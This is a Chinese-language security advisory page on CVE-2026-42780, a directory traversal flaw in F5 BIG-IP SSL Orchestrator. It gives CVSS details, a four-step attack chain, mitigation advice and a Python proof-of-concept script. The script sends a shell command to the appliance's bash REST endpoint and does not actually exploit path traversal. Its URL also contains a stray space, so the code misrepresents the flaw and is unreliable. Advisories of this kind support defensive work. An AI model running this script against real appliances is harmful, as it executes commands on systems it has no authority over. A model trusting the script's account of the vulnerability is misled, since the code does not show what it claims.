CVE-2026-42780 CVSS 4.9 中危

CVE-2026-42780 BIG-IP SSL Orchestrator 目录遍历漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42780

漏洞类型

目录遍历

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

BIG-IP SSL Orchestrator

漏洞概述

F5 BIG-IP SSL Orchestrator 存在目录遍历安全漏洞。由于系统对文件路径校验不严，拥有高权限的已认证攻击者可利用此漏洞遍历系统目录，进而对服务器上的任意本地文件执行覆盖、删除或破坏等恶意操作。尽管需要高权限，但该漏洞仍对系统完整性和数据可用性构成潜在威胁，建议尽快修复。

技术细节

该漏洞源于 BIG-IP SSL Orchestrator 在处理特定文件操作请求时，未能正确过滤用户输入的文件路径参数。攻击者可以通过注入“../”等目录遍历字符序列，突破应用程序的预期目录限制。根据 CVSS 3.1 向量分析，攻击复杂度低（AC:L），但需要高权限（PR:H）且无需用户交互（UI:N）。攻击者在获得高权限账号后，可利用路径遍历技术（如使用“../”序列）绕过目录限制。利用过程中，攻击者通过发送特制的 HTTP 请求，指定目标文件路径，进而执行写入或删除操作。由于影响范围涉及完整性（I:H），攻击者可能通过覆盖系统启动脚本或核心配置文件，导致服务中断或进一步持久化控制。

攻击链分析

STEP 1

步骤1：获取高权限凭证

攻击者通过钓鱼、社会工程学或其他漏洞获取 BIG-IP 管理界面的高权限账号凭证。

STEP 2

步骤2：识别漏洞接口

攻击者分析目标系统，确认存在未过滤路径参数的文件操作接口。

STEP 3

步骤3：构造并发送恶意载荷

攻击者构造包含“../”序列的特制数据包，发送至服务器，试图遍历目录并指定目标文件路径。

STEP 4

步骤4：执行文件破坏

服务器处理该请求，导致攻击者指定的任意本地文件被覆盖、删除或损坏，破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# F5 BIG-IP SSL Orchestrator Directory Traversal PoC Concept
# Target: Vulnerable version of BIG-IP SSL Orchestrator
# Note: This requires High Privilege (PR:H) authentication token

target_ip = "192.168.1.100"
base_url = f"https://{target_ip}/mgmt/tm/ util/bash"
auth_token = "<VALID_ADMIN_TOKEN>"

headers = {
    "Content-Type": "application/json",
    "X-F5-Auth-Token": auth_token
}

# Attempt to overwrite a file using directory traversal
# Payload uses '../' to escape the intended directory
payload = {
    "command": "run",
    "utilCmdArgs": "-c 'echo pwned > ../../tmp/vulnerable_file.txt'"
}

try:
    # Sending the malicious request
    response = requests.post(base_url, json=payload, headers=headers, verify=False)
    
    if response.status_code == 200:
        print("[+] Payload executed successfully. File may be overwritten.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

BIG-IP SSL Orchestrator (具体受影响版本请查阅F5官方公告 K000149743)

防御指南

临时缓解措施

由于漏洞利用需要高权限，建议立即审查所有管理员账号，移除不必要的特权。在未应用补丁前，应严格限制管理界面的访问来源，并密切监控系统配置文件和关键文件的完整性变更。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42780
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42780
3 Details https://www.cvedetails.com/cve/CVE-2026-42780/
4 VulDB https://vuldb.com/cve/CVE-2026-42780
5 Link https://my.f5.com/manage/s/article/K000149743

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表